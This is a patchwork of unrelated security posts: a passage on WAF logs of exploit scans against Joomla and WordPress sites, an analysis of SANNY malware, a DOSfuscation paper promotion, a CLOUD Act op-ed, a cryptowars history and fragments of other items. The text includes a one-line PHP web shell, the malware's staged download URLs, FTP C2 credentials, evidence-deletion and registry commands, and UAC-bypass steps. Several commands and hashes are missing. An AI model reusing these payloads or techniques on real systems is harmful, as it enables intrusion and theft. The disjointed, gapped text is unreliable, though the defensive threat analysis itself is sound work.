The com_rpl entry at the top of the above table is the result of SQL injection via the pid parameter of a GET request in an extension called RealtyNA CRM (Client Relationship Management), which is designed to help Joomla-based real estate websites manage inquiries on property for sale. The vulnerability was disclosed on December 15, 2016 and does not require the attacker to be authenticated to the site. It should be noted that the extension is no longer actively maintained and has been pulled from Joomla's code repository; the vendor, RealtyNA, has directed Joomla users toward its new WordPress plugin.

Most of the above Joomla extensions are vulnerable to SQL injection. When automated tools like SQLmap are used, they iterate through various payload types in an attempt to build a working SQL injection exploit. This is why the numbers are much higher than in the WordPress table below: SQLi attacks are much noisier than XSS or RFI.

Beyond software popularity, the type of exploit matters: an "Unrestricted File Upload" vulnerability, for example, isn't going to trigger a WAF alert unless a rule was specifically written for it. A file upload vulnerability can be more severe than a path traversal vulnerability, but it is not likely to set off nearly as many alarms when exploited, because it is harder to fingerprint, being an error in the code logic itself. The exploit is a normal-looking POST request void of any malicious content, unless the file payload is something obvious like the notorious c99.php web shell.
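A toy signature check illustrates the point; the patterns below are illustrative stand-ins, far simpler than any real WAF ruleset:

```python
import re

# Toy WAF signatures (illustrative only): traversal and SQLi leave telltale
# tokens in the request, but a well-formed multipart upload does not.
SIGNATURES = [re.compile(p, re.IGNORECASE)
              for p in (r"\.\./", r"union\s+select", r"<script")]

def waf_blocks(request_body: str) -> bool:
    """Return True if any signature matches the request body."""
    return any(sig.search(request_body) for sig in SIGNATURES)

print(waf_blocks("q=6156 UNION SELECT 1,2--"))  # SQLi token: flagged

# A file-upload exploit carrying a PHP shell looks like an ordinary POST body:
upload = ('--b\r\nContent-Disposition: form-data; '
          'name="file"; filename="avatar.php"\r\n\r\n'
          '<?php system($_GET["c"]); ?>\r\n--b--')
print(waf_blocks(upload))  # no signature matches: sails through
```

The upload body contains nothing the pattern list recognizes, which is exactly why logic-level vulnerabilities generate so few WAF alerts relative to SQLi.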

With WordPress running on 28.7% of all websites and Joomla in second place at 3.3%, the availability of website security assessment tools follows the same trend. There are various utilities to assess the security of your WordPress and Joomla websites; a few popular ones are listed below.

Application Name   CMS      Project Page
Joomla VS          Joomla

The majority of utilities out there appear to run on the command line, while some are directly integrated into your CMS installation.

The logs I collected retain attack data for 30 days, so I examined recently released and well-known vulnerabilities to study which were the most scanned-for over a 30-day period. I filtered out known penetration testing companies and removed log entries where the connection originated from the target's own network. The Alerts field contains the number of actual payloads blocked by Akamai's WAF; it does not include benign probe requests from web application vulnerability scanners.


When examining the log entries for the Jetpack WordPress plugin, I expected most entries to be attempts to exploit SQL injection or a local file inclusion vulnerability, or perhaps even the latest Jetpack vulnerability disclosed by Sucuri, a stored XSS. Instead, the majority of the scans appeared to simply verify whether Jetpack was installed. If it was, further checks were made for the existence of specific files like class.jetpack-xmlrpc-server.php or example.html; this, it seems, was an attempt to exploit CVE-2014-0173, a bypass vulnerability allowing unrestricted access to some of the RPC calls packaged with WordPress.

The majority of plugins being scanned for have been public for many months, in some cases years. Why do scans continue for legacy vulnerable plugins? Because vulnerability assessment tools scan for the existence of all known vulnerable plugins, usually by testing for a specific file known to be packaged with each one.
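That fingerprinting approach can be sketched in a few lines. The plugin slugs and probe files below are illustrative stand-ins, not a real scanner's database:

```python
# Illustrative (slug, probe-file) fingerprints for known-vulnerable plugins.
FINGERPRINTS = [
    ("jetpack", "class.jetpack-xmlrpc-server.php"),
    ("membership-simplified", "readme.txt"),
]

def probe_urls(base_url: str, fingerprints=FINGERPRINTS) -> list:
    """Build the URLs a scanner would request to test for each plugin."""
    base = base_url.rstrip("/")
    return [f"{base}/wp-content/plugins/{slug}/{probe}"
            for slug, probe in fingerprints]

def detected(base_url: str, fetch_status) -> list:
    """Return slugs whose probe file exists; fetch_status(url) -> HTTP code."""
    return [slug for (slug, _), url in zip(FINGERPRINTS, probe_urls(base_url))
            if fetch_status(url) == 200]

# Example with a stubbed fetcher instead of real HTTP requests:
print(detected("http://example.com", lambda u: 200 if "jetpack" in u else 404))
```

Note that a scanner flags a plugin as present whenever the probe file returns 200, regardless of whether the vulnerability is exploitable, which is why legacy plugins keep showing up in scan traffic.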
Plugin Security – Now

I started re-evaluating plugin security a year later, using the same methodology as before: downloading plugins and manually examining the PHP code for common vulnerabilities like SQLi, XSS, LFI, and RFI. I found that plugins that have not been updated in several months pose the most risk. I also discovered that plugins with more than 100 but fewer than 1,000 downloads haven't been updated in an average of 991 days as of the time of writing, or almost three years. The average plugin in my sample data hasn't been updated in 1,050 days.

# Plugin Downloads        Avg Days Since Last Update
9,999,999 - 1,000,000     150
999,999 - 100,000         458
99,999 - 10,000           941
9,999 - 1,000             1296
999 - 100                 991
< 99                      107*

* This is because these are newly uploaded plugins actively being developed.
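The aggregation behind the table above can be reproduced with a simple bucketing pass. The sample rows here are made up for illustration, not the actual dataset:

```python
from collections import defaultdict
from datetime import date

# Made-up sample rows: (download count, last update date).
plugins = [
    (2_500_000, date(2017, 10, 1)),
    (450_000, date(2016, 12, 1)),
    (5_000, date(2014, 9, 1)),
    (50, date(2018, 2, 1)),
]

# (floor, label) pairs matching the table's download buckets.
BUCKETS = [
    (1_000_000, "9,999,999 - 1,000,000"),
    (100_000, "999,999 - 100,000"),
    (10_000, "99,999 - 10,000"),
    (1_000, "9,999 - 1,000"),
    (100, "999 - 100"),
    (0, "< 99"),
]

def bucket(downloads: int) -> str:
    """Map a download count to its table bucket label."""
    return next(label for floor, label in BUCKETS if downloads >= floor)

def avg_age_by_bucket(rows, today=date(2018, 3, 31)):
    """Average days since last update, grouped by download bucket."""
    ages = defaultdict(list)
    for downloads, updated in rows:
        ages[bucket(downloads)].append((today - updated).days)
    return {label: sum(v) // len(v) for label, v in ages.items()}

print(avg_age_by_bucket(plugins))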


When I originally began researching the widespread exploitation of recently published vulnerabilities, I had some expectations about how it would turn out. I expected the same categories of vulnerabilities to receive equal amounts of attention across all platforms. What I found was that specific vulnerabilities like LFI were favored over others I had expected to be more popular, such as SQL injection.

What I did not expect was the amount of traffic generated by the widespread deployment of scanning tools by enterprise IT staff. While multiple routine daily self-scans appear excessive, at least they're focused on the site's own security. With new vulnerability scanning tools becoming readily available, it's important that software is audited and that vulnerabilities are responsibly reported, fixed, and publicly disclosed. This cycle of research, repair, and publish is currently the best way to keep systems safe and secure.

The post Life Cycle of a Web App 0 Day appeared first on Liquidmatrix Security Digest.

SANNY Malware Delivery Method Updated in Recently Observed Attacks


In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.

Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).

Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.

Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate
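The decode step in item 2 can be replicated offline; the sketch below mirrors what `certutil -decode` does with the Stage 1 file (the payload here is an illustrative stand-in, not the actual 1.txt):

```python
import base64

def decode_fake_pem(text: str) -> bytes:
    """Strip the BEGIN/END marker lines and Base64-decode the body,
    mirroring certutil's handling of the fake SSL certificate."""
    body = "".join(line for line in text.splitlines()
                   if line.strip() and not line.startswith("-----"))
    return base64.b64decode(body)

# Illustrative stand-in for the downloaded Stage 1 file:
fake_cert = ("-----BEGIN CERTIFICATE-----\n"
             + base64.b64encode(b"@echo off\r\nrem stage-1 stub\r\n").decode()
             + "\n-----END CERTIFICATE-----\n")
print(decode_fake_pem(fake_cert))
```

This is handy when triaging similar samples, since the "certificate" can be decoded without ever invoking certutil on the analysis machine.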

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on the Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (a component inside the CAB file):

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:

  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:

  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017
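Assuming the 65-character string maps positionally onto the standard Base64 alphabet plus its '=' pad character, decoding ipnet.ini is a simple character translation. A minimal Python sketch:

```python
import base64

# Custom alphabet recovered from the analysis (64 data chars plus, we assume, a pad)
CUSTOM = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

def decode_custom_b64(data: str) -> bytes:
    """Map the custom alphabet back onto the standard one, then decode."""
    return base64.b64decode(data.translate(str.maketrans(CUSTOM, STANDARD)))
```

Encoding is the same translation in reverse, which makes it easy to regenerate a test config file and verify the decoder round-trips.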

The malware then connects to the FTP server decoded from the aforementioned config file and sets the current directory on the FTP server to “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information and the list of running tasks on the system are gathered by executing commands on the machine, and the collected output is staged for exfiltration.

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware downloads the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip command allows the attacker to migrate the malware to a new FTP C2 server.

  • pull command: This command is used for data exfiltration. It can upload an arbitrary file from the local filesystem to the attacker’s FTP server.

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command copies an existing file on the system to a new location and deletes the file from the original location.

  • default command: If the command begins with the substring “cmd /c” but is not followed by any of the previous commands (chip, pull, or put), then the malware executes it directly on the machine using WinExec.
  • /user command: This command executes a command on the system as the logged-in user. The malware duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.
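The command handling above can be summarized as a small dispatcher. This Python sketch models only the command-name matching; the real argument syntax was not published, so the parsing details are assumptions:

```python
def classify_c2_command(command: str) -> str:
    """Return which handler (chip/pull/put/user/default) a C2 line would hit.
    Only name matching is modeled; the real argument parsing is unknown."""
    if command.startswith("/user"):
        return "user"        # run as the logged-in user via the explorer.exe token
    body = command
    if body.startswith("cmd /c"):
        body = body[len("cmd /c"):].lstrip()
    for name in ("chip", "pull", "put"):
        if body.startswith(name):
            return name
    return "default"         # passed to WinExec unchanged
```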

C2 Command | Purpose

chip command | Update the FTP server config file
pull command | Upload a file from the machine
put command | Copy an existing file to a new destination
/user command | Create a new process with explorer.exe access token
default command | Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages the Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of the IShellDispatch interface to compress the collected data and write it to the ZIP file.
  4. Reads the contents of the ZIP file into memory.
  5. Deletes the ZIP file from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. Base64 encodes the ZIP file contents (using the same custom character set described in the FTP Config File section above) and writes them to %temp%\post.txt.
  8. Calls the FtpPutFileW function to upload the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”
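The Shell.Application/CopyHere routine is Windows-specific, but the overall pipeline (compress to a ZIP, then encode with the custom alphabet) can be reproduced portably. A hedged Python equivalent, with the standard zipfile module standing in for the COM object:

```python
import base64
import io
import zipfile

CUSTOM = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

def pack_for_exfil(name: str, data: bytes) -> str:
    """ZIP-compress collected data in memory, then custom-Base64 encode it,
    mirroring steps 1-7 above (zipfile stands in for Shell.Application)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(name, data)
    encoded = base64.b64encode(buf.getvalue()).decode()
    return encoded.translate(str.maketrans(STANDARD, CUSTOM))
```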

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. cliconfg.exe is a legitimate Windows binary (the SQL Client Configuration Utility) that loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and it results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes commands to set up the Windows registry for the UAC bypass.

  2. Leverages a UAC bypass technique that abuses the legitimate Windows binary fodhelper.exe so that the install.bat file is executed with elevated privileges on Windows 10.

  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system.


This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash | Original Filename

| РГНФ 2018-2019.doc
| Copy of communication from Security Council Committee (1718).doc
a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 (64-bit) |
a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 (32-bit) |

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.
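To give a flavor of the substring techniques the paper covers: cmd.exe's %VAR:~offset,length% syntax lets an attacker assemble a payload from characters of benign environment variables. The following Python helper is hypothetical and models only the common cases (non-negative lengths), expanding such references roughly as cmd.exe would:

```python
import re

def expand_cmd_substrings(command: str, env: dict) -> str:
    """Expand %VAR:~offset,length% references roughly as cmd.exe does."""
    def repl(match):
        value = env.get(match.group(1), "")
        piece = value[int(match.group(2)):]  # offset may be negative (from the end)
        length = match.group(3)
        return piece[:int(length)] if length is not None else piece
    return re.sub(r"%(\w+):~(-?\d+)(?:,(\d+))?%", repl, command)
```

A payload built this way never appears as a literal string in the script, which is exactly what breaks rigid signature-based detections.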

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

The CLOUD Act: a danger to journalists worldwide

[Image: Abdel Fattah el-Sisi. Credit: Wikimedia Commons]

UPDATE: The Omnibus bill, which included the CLOUD Act, was passed by the Senate on Thursday night and signed into law by President Trump on Friday afternoon.

Congress is on the verge of passing a dangerous bill, known as the Clarifying Lawful Overseas Use of Data Act (“CLOUD Act”), which will have disastrous implications for privacy, as it would allow foreign governments to access private data on American soil while circumventing important privacy protections. In particular, it poses a serious threat to foreign journalists who report on repressive regimes.

Current laws dictate that a foreign prosecutor who wants to access data stored by American companies cannot do so directly, since they lack jurisdiction. Instead, they have to go through the “mutual legal assistance treaty” (MLAT) process—which requires sign off from the Justice Department and an order by a judge in each individual case.

MLATs are agreements between two countries in which each agrees to help the other with criminal investigations. The U.S. has signed MLATs with more than 60 countries.

But under the CLOUD Act, instead of relying on the MLAT process, foreign governments could bypass this system and instead demand data directly from technology companies in the United States if they negotiate a blanket agreement with the executive branch.

This poses a real risk for journalists in repressive regimes who rely on internet services provided by American technology companies. For example, say that a journalist in a country like Egypt uses Gmail, and therefore some of their emails are stored on one of Google’s server farms in the United States. In recent years, Egypt has aggressively cracked down on dissent and put hundreds of journalists in jail on politically-motivated charges of terrorism.

Egypt is a strong U.S. ally, and the country currently has an MLAT with the United States. The CLOUD Act gives the power to certify governments under this act to the Trump administration. Trump has heaped praise on Egypt’s military dictator Abdel Fattah el-Sisi. So would his Justice Department give Egypt a blanket certification to proceed under the CLOUD Act?

If the Trump administration does label Egypt a "qualifying foreign government," then whenever the Egyptian government decides that it wants access to a journalist’s emails stored in the United States in order to prosecute that journalist, it could simply request that Google hand over the emails. The Justice Department would not need to approve each individual request, and neither would a federal judge.

Unless a technology company found a request so egregious that it went to court to contest it, no federal judge would even know about the surveillance demand from a foreign government. Foreign governments would be given the power to wiretap conversations on U.S. soil, including conversations that might involve U.S. persons.

To make matters worse, Congress has attached the CLOUD Act to this week’s $1.3 trillion Omnibus spending bill that includes allocation of funds to a wide variety of projects, including the border wall. On March 22, the United States House of Representatives passed the Omnibus spending bill. While it still must pass the Senate to become law, because the spending bill touches so many controversial issues, there will likely be no debate and no hearings on the CLOUD Act—despite its significance for the future of press and information freedom.

Proponents of the bill claim the current process is cumbersome and time consuming. It’s true the MLAT process can take time, but that’s for good reason: to ensure due process. It is immeasurably preferable to legislation that would expand law enforcement’s reach across the world.

Writing in Lawfare, Neema Singh Guliana of the ACLU and Naureen Shah of Amnesty International point out the serious problems with the CLOUD Act’s approach:

"In such a situation, the only real fail-safe to prevent a technology company from inadvertently acceding to a harmful data request is the technology company itself. But would even a well-intentioned technology company, particularly a small one, have the expertise and resources to competently assess the risk that a foreign order may pose to a particular human rights activist? Would it know, as in the example above, when to view Turkey’s terrorism charges in a particular case as baseless? In many cases, companies would likely rely on the biased assessments by foreign courts and fulfill requests."

The CLOUD Act has worrying implications not just for everyone's privacy rights, but also for the ability of journalists around the world to protect their data. Urge your representatives to oppose the Omnibus spending bill as long as it includes the dangerous CLOUD Act.

What Were the CryptoWars?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like Bitcoin). Cryptography is a collection of clever ways for you to protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you choose can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
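For concreteness, a substitution cipher simply replaces each letter according to a fixed mapping. A toy Python illustration (the key here is arbitrary, purely for demonstration):

```python
import string

PLAIN = string.ascii_uppercase
KEY = "QWERTYUIOPASDFGHJKLZXCVBNM"  # arbitrary illustrative substitution key

def encrypt(text: str) -> str:
    """Substitute each uppercase letter; everything else passes through."""
    return text.translate(str.maketrans(PLAIN, KEY))

def decrypt(text: str) -> str:
    return text.translate(str.maketrans(KEY, PLAIN))
```

Breaking such a cipher needs little more than frequency analysis, which is why even far more elaborate substitution schemes eventually fell once interception and computing power scaled up.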

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Shamir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words, the cryptography worked by having a magical secret method known only to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However, that wasn’t the end of the story. As in so many cases, “justice too long delayed is justice denied”. The internet has become systematically protected by encryption only in the last two years, thanks to the amazing work of LetsEncrypt. We spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack, putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

WiTopia personalVPN review: It’s all about choices

WiTopia personalVPN in brief:

  • P2P allowed: Yes
  • Business location: Reston, VA
  • Number of servers: 300+
  • Number of country locations: 45
  • Cost: $50 (Basic) / $70 (Pro)
  • VPN protocol: OpenVPN (default)
  • Data encryption: AES-128
  • Data authentication: SHA2
  • Handshake encryption: TLSv1.2

I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.


Rootkit Umbreon / Umreon – x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
